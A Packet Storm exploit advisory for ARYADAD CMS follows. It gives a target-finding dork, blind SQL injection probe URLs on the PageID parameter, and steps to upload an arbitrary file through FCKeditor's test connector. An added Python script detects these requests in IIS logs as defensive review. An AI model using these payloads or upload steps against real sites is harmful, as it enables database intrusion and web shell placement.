ARYADAD SQL Injection / Shell Upload

2012-01-21T00:00:00
ID PACKETSTORM:108907
Type packetstorm
Reporter Red Security TEAM
Modified 2012-01-21T00:00:00

Description

                                        
`#  
# Title : ARYADAD Multi Vulnerability  
# Author : Red Security TEAM  
# Date : 21/01/2012  
# Vendor : http://cms.aryadad.com/  
# Tested On : Windows Server 2008 (IIS 7.5)  
# Dork : Powered by ARYADAD Corporation  
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM  
# Home : http://RedSecurity.COM  
#  
# Exploit :  
#   
# I : Blind SQL Injection Vulnerability  
# True : http://server/Default.aspx?PageID=117' and 1-1 = '0  
# False : http://server/Default.aspx?PageID=117' and 2-1 = '0  
#  
# II : File Upload Vulnerability  
# 1. Go to : /FA/fckeditor/editor/filemanager/connectors/test.html  
# 2. Set Connector to ASP.Net and upload your file. You can see your uploaded files in FA/userfiles/file/  
#  
`
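
For defenders reviewing an affected site, the following added example (not part of the original advisory) scans IIS W3C logs for the three request patterns the advisory describes: a non-numeric PageID on Default.aspx, requests to the FCKeditor connectors directory, and script files served from userfiles. The log lines are constructed samples, and the function names, the field layout and the extension list are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C log excerpt (not real traffic); 192.0.2.x is a documentation range.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2012-01-21 10:00:01 GET /Default.aspx PageID=117 192.0.2.10 200
2012-01-21 10:00:05 GET /Default.aspx PageID=117'+and+1-1+=+'0 192.0.2.66 200
2012-01-21 10:00:09 GET /FA/fckeditor/editor/filemanager/connectors/test.html - 192.0.2.66 200
2012-01-21 10:00:20 GET /FA/userfiles/file/report.pdf - 192.0.2.10 200
2012-01-21 10:00:31 GET /FA/userfiles/file/x.aspx - 192.0.2.66 200
"""

CONNECTOR = re.compile(r"/fckeditor/editor/filemanager/connectors/", re.I)
# Assumed list of extensions that IIS may execute or treat specially.
SCRIPT_IN_UPLOADS = re.compile(r"/userfiles/.*\.(aspx?|ashx|asmx|cer|asa|config)$", re.I)

def classify(stem, query):
    """Return the findings for one request (URI stem plus raw query string)."""
    findings = []
    if stem.lower().endswith("/default.aspx"):
        # ASP.NET treats query-string keys case-insensitively.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() == "pageid" and not re.fullmatch(r"[0-9]+", value):
                findings.append("non-numeric PageID")
    if CONNECTOR.search(stem):
        findings.append("FCKeditor connector request")
    if SCRIPT_IN_UPLOADS.search(stem):
        findings.append("script file under userfiles")
    return findings

def scan(log_text):
    """Parse W3C log text using its #Fields header; return (client, stem, finding) tuples."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        stem = row.get("cs-uri-stem", "")
        for finding in classify(stem, row.get("cs-uri-query", "-")):
            hits.append((row.get("c-ip"), stem, finding))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Any hit on the connectors path or a script extension under userfiles is worth correlating with file creation times in that directory.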